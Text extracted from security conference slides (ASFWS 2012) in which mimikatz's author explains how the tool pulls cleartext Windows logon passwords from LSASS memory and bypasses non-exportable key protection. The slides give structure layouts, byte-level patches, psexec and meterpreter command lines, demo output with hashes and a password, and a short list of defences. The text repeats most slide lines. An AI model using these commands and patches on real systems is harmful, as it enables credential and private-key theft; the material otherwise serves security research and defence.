typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
